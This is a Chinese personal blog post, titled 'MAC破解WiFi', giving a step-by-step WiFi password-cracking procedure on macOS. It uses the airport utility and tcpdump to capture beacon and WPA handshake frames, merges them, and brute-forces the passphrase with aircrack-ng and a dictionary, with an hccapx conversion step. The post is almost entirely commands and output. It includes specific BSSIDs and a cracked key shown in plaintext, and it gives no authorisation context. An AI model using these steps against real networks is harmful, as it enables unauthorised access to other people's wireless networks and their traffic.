Stay hungry, Stay foolish.

听月的博客

0%

MAC破解WiFi

发表于 分类于
本文字数: 2k 阅读时长 ≈ 2 分钟

1.安装airport

1
$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

2.扫描周围的Wifi

1
$ sudo airport -s

3.嗅探指定的信道

1
$ sudo airport en0 sniff $CHANNEL

如果出现错误,Segmentation fault: 11,可以使用 tcpdump 抓包
4.1 断开airport的连接

1
$ sudo airport -z

4.2 设置信道,-c和信道号之间没有空格

1
2
# 示例:sudo airport -c6
$ sudo airport -c$CHANNEL

4.3 从指定AP开始抓包

1
2
# 示例:sudo tcpdump "type mgt subtype beacon and ether src 98:13:33:b4:35:a4" -I -c 1 -i en0 -w beacon.cap
$ sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en0 -w beacon.cap

4.4 等待WPA的握手

1
2
# 示例:sudo tcpdump "ether proto 0x888e and ether host 98:13:33:b4:35:a4" -I -U -vvv -i en0 -w handshake.cap
$ sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en0 -w handshake.cap

4.5 安装wireshark,下一步会用到它的合包命令

1
$ brew install wireshark

4.6 将2个cap文件合并成一个cap文件

1
$ mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap

至少要等到4.4获取到4 frames或更多的包才可以Ctrl-C终止抓包。

4.7 安装 aircrack-ng

1
$ brew install aircrack-ng

4.8 将 aircrack-ng 路径添加到 /etc/paths 中。

1
$ sudo vim /etc/paths

然后将 aircrack-ng 路径添加到最后一行。

4.9 查看抓到的包中是否包含握手包。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#$ aircrack-ng capture.cap
Hu-YupingdeMacBook-Pro:wifi kris$ aircrack-ng capture.cap
Opening capture.capease wait...
Read 4 packets.

   #  BSSID              ESSID                     Encryption

   1  74:7D:24:D7:AF:DC  @PHICOMM_DA               WPA (0 handshake)

Choosing first network as target.

Opening capture.capease wait...
Read 4 packets.

1 potential targets

Please specify a dictionary (option -w).

  1. 撞击密码

    1
    $ aircrack-ng -w alphaDic.txt -b 98:13:33:B4:35:A4 capture1.cap

  2. 转换包格式,如果使用上面的cap无法爆破,或者爆破比较麻烦,可以将cap包转换成hcccapx格式,然后再破解。

    1
    $ ./cap2hccapx.bin /Users/kris/Desktop/wifi/20200208/capture.cap /Users/kris/Desktop/wifi/20200208/capture.hccapx

下面是一个破解示例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Aircrack-ng 1.5.2 

      [00:03:20] 2018576/13516904 keys tested (10197.95 k/s) 

      Time left: 18 minutes, 47 seconds                         14.93%

                          KEY FOUND! [ 19731009qiu ]


      Master Key     : A8 36 07 C4 68 42 71 E0 B9 38 6E 16 B7 1B 7A 77 
                       DA 07 E9 A1 82 CE 95 56 22 C2 76 16 93 B1 8E 9B 

      Transient Key  : 34 83 20 8E B0 2E F2 11 FF 5B 68 A4 A3 16 94 FE 
                       74 28 4D D9 99 BA 10 38 F4 20 6D 14 D1 47 89 C9 
                       22 75 EB B5 29 FD CF 9B 01 32 38 B7 51 10 94 88 
                       90 4D 52 D5 88 E4 B1 58 DA 2D DC 35 5F 61 88 92 

      EAPOL HMAC     : F6 4D 5F 02 77 F9 96 8A F4 E3 C7 8C DA E4 C6 E0